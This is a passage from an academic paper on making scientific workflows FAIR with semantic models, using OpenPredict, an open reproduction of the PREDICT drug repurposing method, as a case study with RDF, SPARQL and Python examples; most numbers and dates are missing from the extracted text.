prov:qualifiedassociation. therefore, this approach allows the modeller to represent the association of agent roles to an instruction. for example, remzi is the openpredict main developer, so the ‘‘remzi as developer of openpredict’’ (prov:association) links to (a) the ‘‘developer’’ (prov:role) through prov:hadrole property, (b) the remzi object (a prov:agent) through prov:agent; and (c) all opepredict instructions (p-plan:plan), through prov:hadplan. notice that, although the terminology of these properties targeted the perdurant aspect (prov:activity), these properties are also useful for the endurant aspect. 
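as a minimal sketch of the pattern just described (ours, not the project's code), the snippet below builds a tiny workflow description with rdflib: a workflow plan points to its first step with pwo:hasfirststep, the step is ordered with dul:precedes and points to its natural-language instruction through dul:isdescribedby. the namespace iris follow the published ontologies, but the resource names and the instruction text are assumptions for illustration only.

from rdflib import Graph, Namespace, Literal
from rdflib.namespace import RDF, DC

PPLAN = Namespace("http://purl.org/net/p-plan#")
DUL = Namespace("http://www.ontologydesignpatterns.org/ont/dul/DUL.owl#")
PWO = Namespace("http://purl.org/spar/pwo/")
EX = Namespace("http://example.org/wf/")   # hypothetical resources

g = Graph()
for prefix, ns in [("p-plan", PPLAN), ("dul", DUL), ("pwo", PWO), ("ex", EX)]:
    g.bind(prefix, ns)

# a general instruction written in natural language (abstract level)
g.add((EX.plan_prepare_input, RDF.type, PPLAN.Plan))
g.add((EX.plan_prepare_input, DC.description,
       Literal("prepare the input data files")))

# the workflow itself, pointing to its first step
g.add((EX.plan_main_protocol, RDF.type, PPLAN.Plan))
g.add((EX.plan_main_protocol, RDF.type, DUL.Workflow))
g.add((EX.plan_main_protocol, PWO.hasFirstStep, EX.step_prepare_input))

# a lightweight step that only orders the work and points to its instruction
g.add((EX.step_prepare_input, RDF.type, PPLAN.Step))
g.add((EX.step_prepare_input, PPLAN.isStepOfPlan, EX.plan_main_protocol))
g.add((EX.step_prepare_input, DUL.isDescribedBy, EX.plan_prepare_input))
g.add((EX.step_prepare_input, DUL.precedes, EX.step_generate_features))

because the step only carries ordering information, the same instruction can be pointed to by steps of several workflows, which is exactly what enables the reuse of instructions across workflow versions discussed below.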
ideally, they should have the adequate endurant terminology, so instead of prov:hadplan, it should be ‘‘prov:hasplan’’ (similarly for prov:hadrole too). one of the most important links is the one between a workflow execution and its created outputs. for this, we specialized the prov approach by using prov:generated to link a workflow activity (p-plan:activity) to an output artefacts (opmw:workflowexecutionartifact). therefore, each step execution can generate workflow execution artifacts. to represent the specifics of machine learning workflows, we moreover use the ml-schema ontology (mls), such as to specify the trained model and its evaluation measures (via mls:modelevaluation and mls:evaluationmeasure). for example, it can be used to specify the accuracy of the models that were trained during different executions. for the representation of versioning, finally, we use dc:hasversion to assign version identifiers and prov:wasrevisionof to link to the previous versions, and apply this to all relevant elements, including workflows, instructions, software, and datasets. case study topic we evaluate our approach below with a case study of a computational drug repurposing method based on machine learning, called predict (gottlieb et al., ). predict is one of the most frequently cited drug repurposing methods and provides a ranking of drug-disease associations on the basis of their similarity to a set of known associations. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. predict has reported a high auc ( . ) for predicting drug indications, though neither the original data nor the software to produce the results are available. the features for the drug prediction classifier included five drug–drug similarity measures and two disease–disease similarity measures. the similarities between drugs were calculated based on molecular fingerprints, common side effects of drugs, target protein sequence alignment, semantic similarity of target genes of drugs in the gene ontology, and closeness of target proteins in human protein–protein interaction network. for the disease aspect, two disease–disease similarities were calculated based on medical description of diseases and semantic similarity of disease terms in the human phenotype ontology. the method transforms drug–drug and disease–disease similarities into integrated features to be used for a logistic regression training. for evaluating the performance of the logistic regression, -fold cross-validation was used in two different ways: one in which % of drugs are hidden and one in which % of associations are hidden. in the first strategy, % randomly selected drugs in the gold standard and the known indications associated with them were removed. the positive training set consisted of the remaining % of drugs and the indications associated with them. the negative training set consisted of randomly generated drug-disease associations which were not in the positive set. for the second strategy, the known associations were divided into % positive training and % positive test sets, while negative training and test sets were built using randomly generated drug-disease associations from respective sets. in the next section, we report on the application of our approach to this use case. openpredict case study as case study, we took the original predict workflow, as introduced above, and transformed it with our approach to make it open and fair. we therefore call the resulting workflow openpredict. 
it implements the same steps as the original predict, i.e., five drug–drug similarity and two disease–disease similarity measures are used to train a logistic regression classifier to predict potential drug–disease associations (see fig. ). we therefore follow the same general protocol, consisting of four steps:
1. data preparation: in this step, the necessary datasets are collected and preprocessed.
2. feature generation: in this step, we generate features from the collected datasets. drug–drug and disease–disease similarity scores are combined by computing their weighted geometric mean. thus, we combine five drug–drug similarity measures and two disease–disease similarity measures, resulting in combined features.
3. model training: in this step, the features generated in the previous step are used to train a simple logistic regression classifier.
4. model evaluation: this step uses two different cross-validation approaches: one where % of drugs is hidden and one where % of associations is hidden for testing. roc auc, aupr, accuracy, precision and f-score of the classifier on test data are reported.
a minimal sketch of how the feature generation and model training steps can be realised is given below.
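the following sketch is our illustration, not the authors' implementation: pairwise drug–drug and disease–disease similarity scores are combined with a weighted geometric mean into one feature per pair of measures, and a logistic regression classifier is evaluated with k-fold cross-validation (ten folds in this sketch). the arrays, the equal weights and the plain stratified split are assumptions; the second evaluation strategy described above, in which whole drugs are hidden, would additionally require grouping the folds by drug.

import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import StratifiedKFold, cross_validate

def combined_feature(drug_sim, disease_sim, w_drug=0.5, w_disease=0.5):
    # weighted geometric mean of one drug-drug and one disease-disease
    # similarity score (both expected to lie in (0, 1])
    eps = 1e-12  # guard against log(0)
    logs = np.log(np.clip(np.vstack([drug_sim, disease_sim]), eps, None))
    return np.exp(np.average(logs, axis=0, weights=[w_drug, w_disease]))

# hypothetical similarity scores: five drug measures and two disease measures
rng = np.random.default_rng(0)
n_pairs = 1000
drug_sims = rng.uniform(0.01, 1.0, size=(n_pairs, 5))
disease_sims = rng.uniform(0.01, 1.0, size=(n_pairs, 2))
y = rng.integers(0, 2, size=n_pairs)   # known vs. randomly generated associations

# every (drug measure, disease measure) pair yields one combined feature
X = np.column_stack([combined_feature(drug_sims[:, i], disease_sims[:, j])
                     for i in range(drug_sims.shape[1])
                     for j in range(disease_sims.shape[1])])

clf = LogisticRegression(max_iter=1000)
cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)
scores = cross_validate(clf, X, y, cv=cv,
                        scoring=["roc_auc", "average_precision",
                                 "accuracy", "precision", "f1"])
for name, values in scores.items():
    if name.startswith("test_"):
        print(name, round(float(values.mean()), 3))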
below we explain how we made a fair version of predict's input data and then show how we used our approach to model the openpredict workflow that is consuming this data. the implementation and the workflow description of openpredict are available on github (https://github.com/fair-workflows/openpredict).
figure: openpredict workflow (version . ) with manual and computational steps.
fairified data collection
since the original data used in predict is not publicly available, we collected data from open sources and made it fair with linked data (bizer, heath & berners-lee, ) representations. we obtained data about drugs, drug targets, drug chemical structure, and drug target sequence from drugbank (wishart et al., ), and additional drug targets from the kegg dataset (kanehisa et al., ). the sider dataset (kuhn et al., ) was used for drug side effects, and the hgnc and goa datasets (gray et al., ; barrell et al., ) were used for gene identifier mapping and gene ontology (go) annotation, respectively. we used linked data versions of the above-mentioned datasets from bio rdf (callahan, cruz-toledo & dumontier, ), which is an influential resource for the biomedical sciences, providing a network of data collected from several major biological databases. on top of that, we used the supplementary file provided by menche et al. ( ) for protein–protein interactions and disease phenotype annotations that link hpo terms to omim diseases (https://hpo.jax.org/app/download/annotation). mesh annotations were collected from caniza, romero & paccanaro ( ) (https://paccanarolab.org/disease_similarity), and annotations were also obtained via the ncbo annotator api (noy et al., ) using the omim disease descriptions. the data that were not yet in a linked data format were converted to rdf with a fairification process (jacobsen et al., ). we kept copies of the retrieved non-rdf datasets in our github repository to prevent the data access issues that may arise if data sources become unavailable. we also stored the collected datasets in a triplestore and created sparql queries to access the triplestore in order to produce the features for predict's method.
our openpredict workflow has two versions ( . and . ). in the first, we experimented with the fairifier tool for the two inputs that are provided as text files, i.e., the protein–protein interactions in the human interactome and the disease phenotypic descriptions. besides the formalization of the manual steps through our approach, we also provide guidelines for the manual steps. in the second, we wrote python scripts for the fairification process of these datasets, evolving most of the manual steps into computational ones. the table below summarizes the list of all datasets used in versions v . and v . ; openpredict v . also uses a different mesh annotation dataset for disease similarity (indicated with †).
table: all datasets used in openpredict versions v . and v . (dataset file | date retrieved | data format | download url):
bio rdf r datasets (drugbank, kegg, hgnc, sider and goa) | - - | .nq (rdf) compressed as .gz | https://download.bio rdf.org/#/release/ /
predict drug indication gold standard | - - | .tab with tabular separator | https://www.ncbi.nlm.nih.gov/pmc/articles/pmc /bin/msb -s .xls
pubchem-drugbank mappings | - - | .tab with tabular separator | https://raw.githubusercontent.com/dhimmel/drugbank/gh-pages/data/mapping/pubchem.tsv
protein-protein interactions | - - | .txt with tabular separator | https://science.sciencemag.org/highwire/filestream/ /field_highwire_adjunct_files/ /datasets_s -s .zip
hpo phenotype annotations | - - | .tab with tabular separator | http://compbio.charite.de/jenkins/job/hpo.annotations/lastsuccessfulbuild/artifact/misc/phenotype_annotation.tab
†mesh phenotype annotations | - - | .tab with tabular separator | http://www.paccanarolab.org/static_content/disease_similarity/mim mesh.tsv
mesh phenotype annotations (bioportal) | - - | .txt file | https://raw.githubusercontent.com/fair-workflows/openpredict/master/data/external/meshannotationsfrombioporttalusingomimdesc.txt
for this fairification process, the data need to be mapped to formal semantic models. in our case, important concepts included ''protein-protein interaction'' from bioportal, ''protein interactions'' from edam (edam:topic_ ), the bio rdf properties bio rdf:interactor_a and bio rdf:interactor_b for the gene interactors representing the role of a gene in a protein–protein interaction, and ''disease'' and ''has phenotype'' from sio (sio_ and sio_ ).
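as an illustration of the fairification step for one of the non-rdf inputs, the sketch below (ours, not the project's actual script) converts a tab-separated protein–protein interaction file into rdf with rdflib, using interactor properties in the spirit of the bio rdf properties mentioned above. the file name, the column names and the exact vocabulary iris are assumptions; the real openpredict scripts and iris may differ.

import csv
from rdflib import Graph, Namespace
from rdflib.namespace import RDF

B2R = Namespace("http://bio2rdf.org/irefindex_vocabulary:")   # assumed vocabulary iri
EX = Namespace("http://example.org/ppi/")                     # hypothetical resources

g = Graph()
g.bind("b2r", B2R)
g.bind("ex", EX)

with open("protein_protein_interactions.tsv") as f:           # hypothetical input file
    for row in csv.DictReader(f, delimiter="\t"):
        interaction = EX["interaction_" + row["id"]]
        g.add((interaction, RDF.type, EX.ProteinProteinInteraction))
        g.add((interaction, B2R.interactor_a, EX[row["gene_a"]]))
        g.add((interaction, B2R.interactor_b, EX[row["gene_b"]]))

# serialise the triples so they can be loaded into the triplestore
g.serialize("protein_protein_interactions.nt", format="nt")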
openpredict workflow representation
figure illustrates the main steps of the openpredict workflow, in which the main protocol is represented as a dul:workflow and a p-plan:plan, with the version set through the dc:hasversion property. the workflow consists of four steps: data preparation, feature generation, model training and evaluation, and presentation of results. each one is defined by (dul:isdescribedby) its own p-plan:plan. in the first version of openpredict ( . ) all steps within the data preparation were manual (bpmn:manualtask), as were the fairification process and the preparation steps on data that were already provided as rdf. the second version of openpredict ( . ) automated most of these manual steps, requiring less human intervention. we will now go through some of the most important aspects of this representation.
prospective provenance
we decoupled the workflow steps from the instructions, linking a p-plan:step to a p-plan:variable through p-plan:hasinputvar and p-plan:hasoutputvar, while the p-plan:plan links to the prov:usage through the prov:qualifiedusage property, describing how to bind the variable to other resources. this is an example:
opredict:step_download_drugbank_dataset
    rdf:type bpmn:manualtask ;
    rdf:type edam:operation_ ;
    rdf:type p-plan:step ;
    p-plan:hasoutputvar opredict:variable_drugbank_dataset_online ;
    p-plan:isstepofplan opredict:plan_main_protocol_v ;
    dul:isdescribedby opredict:plan_download_drugbank_dataset ;
    dul:precedes opredict:step_save_drugbank_dataset ;
    rdfs:label "download drugbank dataset" ;
.
opredict:plan_download_drugbank_dataset
    rdf:type p-plan:plan ;
    dc:description "download drugbank dataset" ;
    dc:language :linguisticsystem_xsd_language_english ;
    rdfs:label "download drugbank dataset" ;
    prov:qualifiedusage opredict:usage_fetch_download_drugbank_dataset_to_variable ;
.
opredict:usage_fetch_download_drugbank_dataset_to_variable
    rdf:type prov:usage ;
    rdfs:label "link variable to download drugbank dataset" ;
    prov:entity opredict:distribution_release - -drugbank -drugbank.nq.gz ;
    prov:entity opredict:variable_drugbank_dataset_online ;
.
opredict:distribution_release - -drugbank -drugbank.nq.gz
    rdf:type dcat:distribution ;
    rdfs:label "release / / drugbank/drugbank.nq.gz" ;
    dcat:downloadurl "http://download.bio rdf.org/files/release/ /drugbank/drugbank.nq.gz" ;
    dcat:mediatype opredict:dataformat_nq_compressed_gz ;
.
opredict:variable_drugbank_dataset_online
    rdf:type p-plan:variable ;
    rdfs:label "drugbank dataset online" ;
.
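given a graph that contains triples like the ones above, the variable-binding pattern can be resolved with a sparql query; the sketch below runs such a query with rdflib. the file name is hypothetical, and the prefix iris and property casing follow the published p-plan, prov and dcat vocabularies rather than the lowercase rendering shown above, so they should be taken as assumptions.

from rdflib import Graph

g = Graph()
g.parse("openpredict_workflow.ttl", format="turtle")   # hypothetical export of the workflow rdf

q = """
PREFIX p-plan: <http://purl.org/net/p-plan#>
PREFIX prov:   <http://www.w3.org/ns/prov#>
PREFIX dcat:   <http://www.w3.org/ns/dcat#>
SELECT ?plan ?variable ?url WHERE {
  ?plan a p-plan:Plan ;
        prov:qualifiedUsage ?usage .
  ?usage prov:entity ?variable , ?distribution .
  ?variable     a p-plan:Variable .
  ?distribution a dcat:Distribution ;
                dcat:downloadURL ?url .
}
"""
# each row links an instruction to the variable it uses and the file to download
for plan, variable, url in g.query(q):
    print(plan, variable, url)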
retrospective provenance
we represent the concrete executions that happened and the concrete output that was generated with a p-plan:activity that is linked to a p-plan:step through the p-plan:correspondstostep property and to the outputs (opmw:workflowexecutionartifact) through prov:generated. each output has a value (e.g., an accuracy rate) and is linked to a prov:generation through the prov:qualifiedgeneration property, which specifies when the generation occurred (prov:attime). this is an example:
opredict:activity_model_preparation_train_and_evaluation_execution_
    rdf:type p-plan:activity ;
    p-plan:correspondstostep opredict:step_model_preparation_train_and_evaluation ;
    prov:generated opredict:modelevaluation_accuracy_execution_ ;
    prov:generated opredict:modelevaluation_averageprecision_execution_ ;
    prov:generated opredict:modelevaluation_f _execution_ ;
    prov:generated opredict:modelevaluation_precision_ ;
    prov:generated opredict:modelevaluation_recall_execution_ ;
    prov:generated opredict:modelevaluation_rocauc_execution_ ;
.
opredict:modelevaluation_accuracy_execution_
    rdf:type mls:modelevaluation ;
    dc:description " . " ;
    mls:specifiedby opredict:evaluationmeasure_predictiveaccuracy ;
    prov:qualifiedgeneration opredict:generation_execution_ ;
.
opredict:generation_execution_
    rdf:type prov:generation ;
    prov:attime " - - t : : . "^^xsd:datetime ;
.
versioning of workflows
we track the modifications across the two versions with the dc:hasversion property on the level of a dul:workflow, p-plan:plan, dc:linguisticsystem, and prov:softwareagent. furthermore, we use the prov:wasrevisionof property to link to the previous version. this is an example:
opredict:plan_main_protocol_v
    rdf:type p-plan:plan ;
    rdf:type dul:workflow ;
    dc:created " - - " ;
    dc:creator opredict:agent_remzi ;
    dc:description "openpredict main protocol v. . " ;
    dc:hasversion " . " ;
    dc:language :linguisticsystem_xsd_language_english ;
    dc:modified " - - " ;
    pwo:hasfirststep opredict:step_prepare_input_data_files_v ;
    rdfs:label "main protocol v. . " ;
    prov:wasattributedto opredict:agent_remzi ;
    prov:wasrevisionof opredict:plan_main_protocol_v ;
.
opredict:plan_main_protocol_v
    rdf:type p-plan:plan ;
    rdf:type dul:workflow ;
    dc:created " - - " ;
    dc:creator opredict:agent_remzi ;
    dc:description "openpredict main protocol v. . " ;
    dc:hasversion " . " ;
    dc:language :linguisticsystem_xsd_language_english ;
    dc:modified " - - " ;
    pwo:hasfirststep opredict:step_prepare_input_data_files ;
    rdfs:label "main protocol v. . " ;
    prov:wasattributedto opredict:agent_remzi ;
.
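the versioning and retrospective provenance statements above can be combined in a single cq -style query that lists each workflow version, the version it revises, and the artifacts generated by executions of its steps. the sketch below is our own; the file name is hypothetical, and the iris (dcterms for dc:hasversion, camel-cased prov and p-plan terms) are assumptions about how the lowercase rendering above maps to the published vocabularies.

from rdflib import Graph

g = Graph()
g.parse("openpredict_workflow.ttl", format="turtle")   # hypothetical export of the workflow rdf

q = """
PREFIX p-plan: <http://purl.org/net/p-plan#>
PREFIX prov:   <http://www.w3.org/ns/prov#>
PREFIX dc:     <http://purl.org/dc/terms/>
SELECT ?workflow ?version ?previous ?artifact WHERE {
  ?workflow dc:hasVersion ?version .
  OPTIONAL { ?workflow prov:wasRevisionOf ?previous . }
  OPTIONAL {
    ?step     p-plan:isStepOfPlan ?workflow .
    ?activity p-plan:correspondsToStep ?step ;
              prov:generated ?artifact .
  }
}
ORDER BY ?version
"""
for row in g.query(q):
    print(row.workflow, row.version, row.previous, row.artifact)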
rich metadata for workflow and input and output data were created using hcls (https://www.w .org/tr/hcls-dataset/) and fair data point specification (f ). in addition, the metadata we generated contains an explicit global and persistent identifier of the data they describe (f ). in order to enable the workflow and the data used to be searched, they were uploaded in a triple-store as a fair data point (https://graphdb.dumontierlab.com/repositories/openpredict). data can be queried through sparql over http(s) protocol (a . ). since the data is not private or protected, we don’t require authentication and authorisation mechanism (a . ). all data and metadata are permanently available at zenodo (https://doi.org/ . /zenodo. ) to make the metadata accessible even the data is no longer available (a ). we used rdf and owl with commonly used controlled vocabularies and ontologies such as bio rdf vocabulary, sio and prov to model input data and workflows (i ). hcls dataset specification and fair data point specification were used to define the metadata and provenance of data (i ). meaningful links between (meta)data such bio rdf links and data and workflow were created (i ). to increase reusability of the workflow, we describe the workflow and its data with community standards such as ml-schema and p-plan (r ). we provide the license (r . ) and provenance information in the metadata using fair data point specification (r . ), and hcls specification (r . ) and prov. answering competency questions besides evaluating whether each fair principle was addressed, we also assessed the unified model using the common semantic validation approach, which is based on sparql queries used to answer the competency questions. all questions listed in ‘the fair workflows approach’ could be answered by running the sparql queries over the openpredict use case. the complete queries and results can be found online (https://github.com/fair-workflows/openpredict). therefore, the reproduction of this validation can be performed by re-executing the queries on the rdf representation of the openpredict workflow. below we explain the result for each competency question. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/tr/hcls-dataset/ https://graphdb.dumontierlab.com/repositories/openpredict https://doi.org/ . /zenodo. https://github.com/fair-workflows/openpredict http://dx.doi.org/ . /peerj-cs. cq - questions about manual steps. cq . : which steps are meant to be executed manually and which to be executed computationally? the sparql query we built to answer this question first filters all steps within the first version of openpredict workflow (opredict:plan_main_protocol_v ). the results show each step and its type—manual (bpmn:manualtask) or computational (bpmn:scripttask)—as well as the respective instructions (p-plan:plan) that describe the steps. in summary, openpredict v . has manual steps and computational steps ( in total), while v . has manual steps and computational steps ( in total). this difference reflects the automatization of most of the manual steps within data preparation (evolving from manual to computational) and the simplification of the computational steps described in fewer jupyter notebook cells. cq . :for the manual steps, who are the agents responsible to execute them? 
to answer this question we filtered the results for only manual steps through the statement: values ?steptype bpmn:manualtask the result is a list of all steps and roles related to each one, such as executor, creator, developer, and publisher. for example, remzi is creator, developer and executor of all instructions, while ahmed is developer of some computational steps and joao is the executor of the entire openpredict workflow. this approach allows for the representation of multiple roles played by different agents within each step. as in related approaches such as workflow ever and reproduce-me, we use the prov ontology to address the different types of agents and roles through the prov:wasattributedto property, and apply the dc:creator and dc:publisher properties for the direct relation from an instruction to an agent. cq . : which datasets were manually handled and what are their formats? openpredict’s computational steps use datasets, as explained in ‘fairified data collection’, that required manual pre-processing. the difference between v . and v . is that we automated the manual pre-processing of two datasets in v . ; mesh phenotype annotations and protein-protein inter-actions. the main elements of the query reflect the fair data point specification with dcat elements (dcat:distribution, dcat:downloadurl and dcat:mediatype), prov (prov:usage and prov:qualifiedusage) and edam classification for data handling steps (edam:operation_ ) and data formats (media types). cq . : what are the types of manual steps involved, and what are their inputs and outputs? similar to the reproduce-me approach, our ontology leverages on the p-plan ontology to address the variables used as input and output of the manual steps, mostly during data preparation in openpredict v . , such as downloading and saving the datasets listed in the results of cq . . for example, the input of opredict:step_save_files_in_triplestore are variables that indicate the local file of each dataset (serialized as rdf) and the output variable indicating the endpoint to upload all datasets (opredict:variable_triplestore_endpoint_for_input_data). celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. when changing the filter from manual steps to computational steps, the pattern followed was to classify the output variables of a step (a jupyter notebook cell) according to the data saved in files. for example, in feature generation, the opredict:step_feature_generation_ _pipeline_source_cell has an output variable for drug fingerprint similarity, indicating the generation of the file ‘‘drugs-fingerprint-sim.csv’’. cq - questions about instantiation of general workflows by more specific ones. cq . : what are the main steps of a general workflow? openpredict workflow follows the common machine learning pipeline process of: data preparation, feature generation, model training, model evaluation and presentation of results. the query returns these steps by looking for the first step of the workflow (through pwo:hasfirststep) and following the preceding path in a recursive way, e.g., ?step dul:precedes ?step . ?step dul:precedes ?step . ?step dul:precedes ?step . (until there is no preceding steps) the classification of the step is given by the edam specializations of the operation concept (operation_ ), such as data handling for data preparation (edam:operation_ ). for the sake of simplicity, model training and evaluation were performed within the same step. 
the main steps are listed below: opredict:step_prepare_input_data_files opredict:step_feature_generation_pipeline_openpredict_ipynb opredict: step_model_preparation_train_and_evaluation_workflow_openpredcit_ - _ml_ipynb opredict:step_format_results_for_presentation cq . : what are the steps of a specific workflow? similar to the previous question, the sparql query uses the properties that allow for the ordering of steps execution (pwo:hasfirststep and dul:precedes). the pattern p- plan:step dul:isdescribedby p-plan:plan allows us to answer this question, by representing how a step is described by an instruction. this pattern resembles the one used by workflow ever, which applies the wfdesc:hasworkflowdefinition (dul:isdescribed) to link a wfdesc:workflow (p-plan:step) to a wfdesc:workflowdefinition (p-plan:plan), aiming at representing the instructions (e.g., a python script) that are natively understood by the wfdesc:workflowengine (prov:softwareagent). however, different from this approach, we classify the instruction language (p-plan:plan dc:language dc:linguisticsystem), allowing for the representation of instructions that follow computer language or natural language, which includes pseudo-code—commonly used to specify algorithms before implementing in a particular computer language. the results show that openpredict has steps in total, where steps belong to v . and belong to v . , each step linked to an instruction. instructions were reused from v . to v . regarding data preparation, thus, v . presents new instructions that are used to automate the data preparation phase. these instructions are written as either english (natural language) or python . (computer language), where most of the python celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ones refer to the jupyter notebook cells for feature generation and model training and evaluation. cq . : what higher-level description does a certain workflow step instantiate? the sparql query to answer this question includes the pattern p-plan:plan dul:isdescribedby p-plan:plan, which extends the capability described in the previous question, i.e., decoupling steps from instructions, enabling the representation of different abstraction levels of instructions and their relations. this pattern resembles the links between specification artefacts (e.g., conceptual model, activity diagrams and use cases) and implementation artefacts (e.g., software code, deployment procedures and automated tests) in software engineering. usually, a specification artefact aims at describing the instructions necessary to enable a programmer to create the software code, sometimes automatically generated as in model-driven engineering. for example, a pseudo-code within an activity diagram (p-plan:plan) may describe the behaviour expected (dul:isdescribed) for the algorithm behind a service endpoint, which may be implemented as a python script (p-plan:plan). openpredict did not formally follow the specification phase of software engineering since it is a research project, having the code developed from the data scientist interpretation perspective about publications related to predict. in research-oriented data science this type of approach is common. however, we created some examples of the pattern that represent the specification of openpredict workflow. 
therefore, the results of this query include jupyter notebook cell instructions (p-plan:plan), representing implementation artefacts, that were specified (p-plan:isdescribedby) by specification instructions (p- plan:plan). the level of abstraction can be derived from the properties of the instruction. for example, the jupyter notebook cell instructions were written (dc:language) in python . (schema:computerlanguage), while the specification instructions were written in english (en value of xsd:language). furthermore, this approach enables links of s (specification artefacts) x i (implementation artefacts), where i¿s, i.e., a specification artefact usually describes several software code lines (instructions). in openpredict, the first specification instruction guides the load of input datasets, which is linked to cells – of the feature generation step, while the second guides the calculation of scores between pairs of drugs and compute similarity feature, which is linked to cells – . cq - questions about versioning of workflows and their executions cq . : what are the existing versions of a workflow and what are their provenance? the collective workflow (the whole) is represented as a dul:workflow and a p-plan:plan. similar to other approaches (workflow ever, reproduce-me, cwlprov, among others) the query to answer this question makes use of dc properties (e.g., dc:creator, dc:created, dc:modified) and prov (e.g., prov:wasattributedto) for prospective provenance. it also covers workflow versioning through dc:hasversion and prov:wasrevisionof, where the former is responsible for version of dul:workflow and the latter to link an instruction to another (p-plan:plan prov:wasrevisionof p-plan:plan pattern). the retrospective celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (executions) provenance is supported by the link from an execution (a p-plan:activity) to the correspondent step (p-plan:correspondstostep property), which is a pattern that resembles most of the aforementioned semantic models. the main difference here is the assumption that any instruction (p-plan:plan) should be versionable, thus, all executions link to a versioned instruction. differently from workflow ever approach, here we do not introduce any elements regarding the specification of the changes (e.g., roevo:changespecification). the results for openpredict show workflows (v . and v . ), both created by and attributed to remzi, where v . links to the prior version (v . ). cq . : which instructions were removed/changed/added from one version to another? three sparql queries were written to answer whether the instructions of openpredict v . were removed or changed or added in v . . each sparql uses the identifier of the workflow versions (retrieved in cq . ) as an input parameter to perform the comparison from one version to another. for the query for removed instructions, it considers all instructions used in v . that are not used in v . and excludes the instructions that were changed. for the query for changed instructions, it considers the instructions with the prov:wasrevisionof property. for the query for added instructions, the sparql query uses the reverse logic from the removed. forty-seven instructions were removed from v . to v . due to the refactoring of the code of feature generation, model training and model evaluation, and the elimination of several manual steps in data preparation. 
three instructions were changed, reflecting the porting of the fairification manual steps to computational steps in data preparation, i.e., download and save human interactome and phenotype annotations. seven instructions were added in v . , where of them represent the new python scripts for data preparation of the new data sources, other represent the new scripts for feature generation and the remaining for model training. cq . : which steps were automatized from one version to another? this query is quite similar to the one used for changed instructions (cq . ) but it makes explicit that the old version of the instruction used as manual step (bpmn:manualtask) was modified to an instruction used as computational step (bpmn:scripttask) in the new version. the results confirm the findings from the previous query regarding the instructions that were ported from manual steps to computational steps, namely the data preparation top-level instruction, the fairification instructions (download and save human interactome and phenotype annotations). although our approach covers change management, we face the same challenges regarding the dependency of the developer practices for code versioning. this means that, for example, a developer is free to choose whether to remove files from an old version of the software implementation and add files to the new version, even though these files refer to the same capability or routines. most of the version controls track the changes when the files (old and new) have the same name and path (i.e., the step identifier), which is a similar approach used here. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cq . : which datasets were removed, changed, or added from one version to the next? this question can be answered by mixing the same query of cq . (datasets manually used) with the logic used in query cq . , i.e., one sparql query to the datasets removed, one for the changed and one for the added. the query results over openpredict (v . and v . ) confirm the findings of cq . , where none datasets were removed from the old version to the new, none changed and were added. cq . : which workflow version was used in each execution and what was generated? this question is answered by using the pattern p-plan:activity p-plan:correspondstostep p-plan:step, where the step is part of the dul:workflow that provides the workflow version. the openpredict workflow had executions represented with our unified model, exemplifying the execution of some computational steps, i.e., each one a particular jupyter notebook cell. therefore, this approach allows for the representation of multiple executions of each step according to the version of the corresponding instruction. each execution inherits the properties of p-plan:activity, e.g., the event start and end time points. furthermore, each execution is associated to the correspondent generated artefacts through the p-plan:activity prov:generated opmw:workflowexecutionartifact pattern, a similar approach of workflow ever, which applied the inverse property prov:wasgeneratedby. an artefact generated by an execution can be an evaluation measure of the trained model, such as the model accuracy and recall for that particular execution, i.e., a mls:modelevaluation. therefore, openpredict executions generated the values about the model evaluation measures of accuracy, average precision, f , precision, recall and roc auc. 
for example, the results show that the model accuracy of v . is . , while v . is . . this query can be further extended by considering the particular version of each instruction that the executed step implements. in addition, ideally, each output of a jupyter notebook cell should be represented as a opmw:workflowexecutionartifact, so all generated outputs are stored (similar to provbook/reproduce-me approach). this query can be easily changed to provide aggregations for related analytical questions, such as how often each workflow version was executed. discussion before we move on to discuss the encountered reproducibility challenges and other issues, we would like to first highlight the two fair perspectives that our approach embodies and demonstrates. firstly, fair applies to the datasets that a scientific workflow consumes and produces, e.g., the protein–protein interactions dataset used by openpredict, and we need fairification approaches to raise existing datsets to this standard. this is the aspect the fair principles originally focused on. on top of that, we have here proposed and exemplified a second perspective. this additional perspective regards the workflows’ own fairification, i.e., the process of aligning them with the fair principles, which relies on a semantic modelling approach such as the one described in this paper. our work therefore celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. expands the notions of fair and fairification from the relatively static artifacts of datasets to the dynamic processes of workflows. reproducibility challenges it was expected that our study would be unable to fully reproduce the accuracy of the method reported in the predict paper due to use of different input datasets. the performance results of this study are lower than originally reported. the predict paper reported an auc of . in cross-validation, but using the same gold standard, we could only achieve auc of . . we were also able to obtain the drug and disease similarity matrices used in predict from the authors via email request. given drug–drug similarity measures for drugs and disease–disease similarity measures for diseases, there are resulting features of combined drug-disease similarities. the logistic classifiers were trained with these pre- computed similarity scores and an average auc of . was obtained from repetitions in a -fold cross-validation scheme. this is still a significant difference from the auc of . what the authors reported in predict study. this indicates that there was more likely an error in the design or implementation of evaluation, and not the aggregation of data nor the calculation of drug-drug and disease-disease similarity scores. while attempting to reproduce the predict study, we faced the following issues, which we have turned into generic recommendations (highlighted in italics). . insufficient documentation essential details concerning the calculation of features were not clearly defined, nor was the software code to perform the calculations provided. many details of an experiment, including data sets, processing parameters and applied software and algorithms need to be specified in order to facilitate the replication of the results. a methods section in a scientific article may not be the best place to provide all this information as it is usually limited by size constraints and different organization styles of journals and conference proceedings, leading to a lack of required detail. . 
